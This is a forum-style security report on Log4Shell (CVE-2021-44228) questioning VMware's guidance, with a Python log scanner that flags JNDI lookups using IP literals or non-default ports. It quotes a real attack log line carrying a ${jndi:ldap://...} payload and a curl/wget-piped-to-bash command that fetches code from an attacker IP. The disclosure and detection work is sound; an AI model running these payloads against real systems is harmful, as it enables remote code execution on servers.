CVE-2021-44228

Regarding https://www.vmware.com/security/advisories/VMSA-2021-0028.html (CVE-2021-44228):

Please be aware that attackers are targeting servers also without DNS resolution.

45.155.205.233 - - [10/Dec/2021:14:23:29 +0100] "GET / HTTP/1.1" 200 300 "-" "${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KG(cut_for_security)}"

Command that is sent to systems:

(curl -s 45.155.205.233:5874/(ip_cut_for_security):80||wget -q -O- 45.155.205.233:5874/(ip_cut_for_security):80)|bash

On the VMware KB https://kb.vmware.com/s/article/87086, VMware is referring to traffic that comes in on the LDAP port, but as you can see above, attackers are using dynamic ports to actually perform that attack. And also they are not using DNS for lookups in 40/60 cases. Please verify if that is consistent with your KB and protection.

Thanks,
Chris
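An added example (my code, not from Chris's post or VMware's KB) that does the check the post asks for on the defender's side: it parses the JNDI lookup out of access-log lines and flags lookups whose host is an IP literal (no DNS resolution needed) or whose port is not the scheme's default, since a filter keyed only on the LDAP port would miss the posted entry. The sample log lines are constructed; the first mirrors the posted entry with the payload cut.

```python
import ipaddress
import re

# Constructed sample access-log lines (not from the original post), mimicking
# the pattern reported: JNDI lookup strings planted in the User-Agent field.
SAMPLE_LOG = """\
45.155.205.233 - - [10/Dec/2021:14:23:29 +0100] "GET / HTTP/1.1" 200 300 "-" "${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KG_REDACTED}"
198.51.100.7 - - [10/Dec/2021:14:25:01 +0100] "GET /index.html HTTP/1.1" 200 1234 "-" "${jndi:ldap://callback.example.test/a}"
203.0.113.9 - - [10/Dec/2021:14:26:40 +0100] "GET / HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

# Default ports per JNDI scheme; a lookup on any other port is "dynamic".
DEFAULT_PORTS = {"ldap": 389, "ldaps": 636, "rmi": 1099, "dns": 53}

# Matches the lookup as it appears in the post: ${jndi:<scheme>://<host>[:<port>]/...
JNDI_RE = re.compile(r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^:/}\s]+)(?::(?P<port>\d+))?")

def analyse_lookup(line):
    """Return None, or a dict describing the JNDI lookup found in this log line."""
    m = JNDI_RE.search(line)
    if m is None:
        return None
    scheme, host = m.group("scheme"), m.group("host")
    port = int(m.group("port")) if m.group("port") else DEFAULT_PORTS.get(scheme)
    try:
        ipaddress.ip_address(host)
        ip_literal = True          # attacker avoids DNS entirely
    except ValueError:
        ip_literal = False         # hostname: a DNS lookup would precede the connect
    return {
        "scheme": scheme,
        "host": host,
        "port": port,
        "ip_literal": ip_literal,
        "nonstandard_port": port != DEFAULT_PORTS.get(scheme),
    }

def scan(log_text):
    """Return a list of (line_number, finding) for every line containing a lookup."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        f = analyse_lookup(line)
        if f:
            findings.append((n, f))
    return findings

if __name__ == "__main__":
    for n, f in scan(SAMPLE_LOG):
        print(n, f)
```

Run it against your own access logs to see which lookups would have slipped past a port-389-only filter.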